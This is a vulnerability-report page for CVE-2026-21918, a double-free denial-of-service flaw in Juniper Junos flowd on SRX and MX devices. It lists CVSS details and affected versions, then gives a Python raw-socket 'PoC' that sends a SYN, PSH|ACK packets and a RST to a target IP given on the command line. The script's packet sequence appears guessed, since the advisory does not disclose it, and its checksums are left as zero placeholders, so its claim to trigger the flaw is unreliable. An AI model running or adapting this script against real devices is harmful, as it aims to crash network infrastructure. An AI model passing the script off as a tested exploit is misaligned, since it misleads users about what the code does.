Security Vulnerability Report
CVE-2026-21918 CVSS 7.5 HIGH

CVE-2026-21918

Published: 2026-01-15 21:16:08
Last Modified: 2026-01-23 19:41:38

Description

A Double Free vulnerability in the flow processing daemon (flowd) of Juniper Networks Junos OS on SRX and MX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). On all SRX and MX Series platforms, when during TCP session establishment a specific sequence of packets is encountered a double free happens. This causes flowd to crash and the respective FPC to restart.

This issue affects Junos OS on SRX and MX Series:

* all versions before 22.4R3-S7,
* 23.2 versions before 23.2R2-S3,
* 23.4 versions before 23.4R2-S4,
* 24.2 versions before 24.2R2.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:22.4:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:22.4:r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:22.4:r1-s1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:juniper:junos:22.4:r1-s2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:juniper:mx10004:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:mx10008:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:mx2008:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:mx2010:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:juniper:mx2020:-:*:*:*:*:*:*:* - NOT VULNERABLE
Juniper Junos OS (SRX/MX) < 22.4R3-S7
Juniper Junos OS 23.2 < 23.2R2-S3
Juniper Junos OS 23.4 < 23.4R2-S4
Juniper Junos OS 24.2 < 24.2R2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-21918 PoC - Double Free in Juniper Junos flowd
# This PoC demonstrates sending specific TCP packet sequence to trigger the vulnerability
# Note: This is for educational and authorized testing purposes only
import sys
import socket
import struct
import time

def craft_tcp_packet(src_ip, dst_ip, src_port, dst_port, seq, flags, payload=b''):
    """Craft a TCP packet with custom flags and sequence number"""
    # IP Header
    ip_header = struct.pack('!BBHHHBBH4s4s',
        0x45,  # Version 4, IHL 5
        0x00,  # TOS
        20 + 20 + len(payload),  # Total Length
        0x0000,  # Identification
        0x4000,  # Flags + Fragment Offset (Don't Fragment)
        64,  # TTL
        6,  # Protocol (TCP)
        0x0000,  # Checksum (placeholder)
        socket.inet_aton(src_ip),
        socket.inet_aton(dst_ip)
    )
    # TCP Header
    tcp_header = struct.pack('!HHLLBBHHH',
        src_port,  # Source Port
        dst_port,  # Destination Port
        seq,  # Sequence Number
        0,  # Acknowledgment Number
        0x50,  # Data Offset (5 * 4 = 20 bytes)
        flags,  # Flags
        65535,  # Window Size
        0x0000,  # Checksum (placeholder)
        0x0000  # Urgent Pointer
    )
    return ip_header + tcp_header + payload

def exploit_cve_2026_21918(target_ip, target_port=443):
    """
    Attempt to trigger the Double Free vulnerability
    This sends a specific sequence of TCP packets during session establishment
    """
    src_ip = '192.168.1.100'
    src_port = 12345
    print(f"[*] Starting CVE-2026-21918 exploitation attempt")
    print(f"[*] Target: {target_ip}:{target_port}")
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
        sock.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
        # Step 1: Send initial SYN with specific sequence
        print("[*] Step 1: Sending initial SYN...")
        syn_packet = craft_tcp_packet(src_ip, target_ip, src_port, target_port, 1000, 0x02)
        sock.sendto(syn_packet, (target_ip, 0))
        time.sleep(0.1)
        # Step 2: Send specific packet sequence to trigger Double Free
        print("[*] Step 2: Sending trigger packet sequence...")
        for i in range(5):
            # Send packets with specific flags combination
            trigger_packet = craft_tcp_packet(
                src_ip, target_ip, src_port, target_port,
                1000 + i,
                0x18,  # PSH|ACK flags
                b'\x00' * 20  # Malformed payload
            )
            sock.sendto(trigger_packet, (target_ip, 0))
            time.sleep(0.05)
        # Step 3: Send RST to force cleanup
        print("[*] Step 3: Sending RST...")
        rst_packet = craft_tcp_packet(src_ip, target_ip, src_port, target_port, 1010, 0x04)
        sock.sendto(rst_packet, (target_ip, 0))
        print("[*] Packet sequence sent. Monitor target for flowd crash.")
    except Exception as e:
        print(f"[!] Error: {e}")
        return False
    return True

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 443
    exploit_cve_2026_21918(target, port)
